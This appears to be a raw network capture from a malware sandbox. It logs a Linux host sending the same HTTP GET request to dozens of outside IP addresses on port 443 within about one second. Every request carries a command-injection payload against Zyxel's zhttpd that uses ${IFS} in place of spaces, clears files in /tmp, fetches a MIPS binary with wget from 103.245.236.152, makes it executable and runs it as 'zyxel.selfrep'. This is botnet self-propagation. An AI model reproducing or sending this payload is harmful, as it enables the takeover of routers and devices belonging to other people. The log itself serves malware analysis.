                                            Jan 14, 2024 15:50:43.492516994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5461192.168.2.2335064173.11.99.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492542982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5462192.168.2.2358628107.216.35.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492553949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5463192.168.2.2345318165.40.36.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492582083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5464192.168.2.234218698.167.215.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492626905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5465192.168.2.2340746178.167.135.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492638111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5466192.168.2.234754236.137.140.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492679119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5467192.168.2.2336218154.130.251.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492702961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5468192.168.2.2360862146.154.108.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492738008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5469192.168.2.2340144115.167.119.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492772102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5470192.168.2.2347768151.113.111.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492794037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5471192.168.2.234335827.11.13.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492841005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5472192.168.2.2340056109.122.164.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492865086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5473192.168.2.2340964157.87.96.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492889881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5474192.168.2.2343092194.239.231.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492930889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5475192.168.2.2337238177.49.147.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492964029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5476192.168.2.2343176142.181.253.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.492983103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5477192.168.2.2354274143.142.221.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493000984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5478192.168.2.233828434.41.214.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493048906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5479192.168.2.235230279.245.57.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493051052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5480192.168.2.234961885.76.63.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493077040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5481192.168.2.236087451.15.241.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493108034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5482192.168.2.234969013.57.37.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493159056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5483192.168.2.2349908172.140.253.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493172884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5484192.168.2.2346702122.23.211.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493208885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5485192.168.2.233582845.147.200.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493242979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5486192.168.2.2359032188.104.251.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493278027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5487192.168.2.2352812107.120.204.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493318081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5488192.168.2.235050644.171.156.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493346930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5489192.168.2.2344666167.71.212.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493371010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5490192.168.2.2358620106.21.128.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493393898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5491192.168.2.2342832179.24.27.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493410110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5492192.168.2.234244035.83.23.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493438005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5493192.168.2.2352784195.16.79.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493458986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5494192.168.2.2336778191.47.125.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493489981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5495192.168.2.233963041.7.181.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493522882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5496192.168.2.235547235.178.80.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493551016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5497192.168.2.2351050115.130.219.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493571043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5498192.168.2.2343566192.70.81.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493607998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5499192.168.2.234427076.79.229.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493637085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5500192.168.2.2335712207.244.148.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493662119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5501192.168.2.2354712201.139.93.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493699074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5502192.168.2.234627699.152.63.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493717909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5503192.168.2.2343468124.33.160.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493755102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5504192.168.2.233384483.86.48.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493788004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5505192.168.2.235841620.146.209.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493839025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5506192.168.2.234364661.105.233.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493839979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5507192.168.2.2357508115.192.158.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493881941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5508192.168.2.2355740196.118.148.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493906975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5509192.168.2.2354030220.2.110.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493938923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5510192.168.2.233630285.214.30.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493968010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5511192.168.2.2358248179.149.165.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.493989944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5512192.168.2.2350146208.84.175.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494029045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5513192.168.2.2354764196.49.81.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494060993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5514192.168.2.233425664.140.67.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494087934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5515192.168.2.233912617.9.6.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494090080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5516192.168.2.234698482.198.106.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494112968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5517192.168.2.235897643.153.123.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494162083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5518192.168.2.234321061.204.67.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494179964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5519192.168.2.234501882.231.130.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494214058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5520192.168.2.2339900184.46.141.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494234085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5521192.168.2.233604218.37.95.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494249105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5522192.168.2.2346336179.0.230.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494275093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5523192.168.2.233834838.253.141.111443
                                            TimestampBytes transferredDirectionData
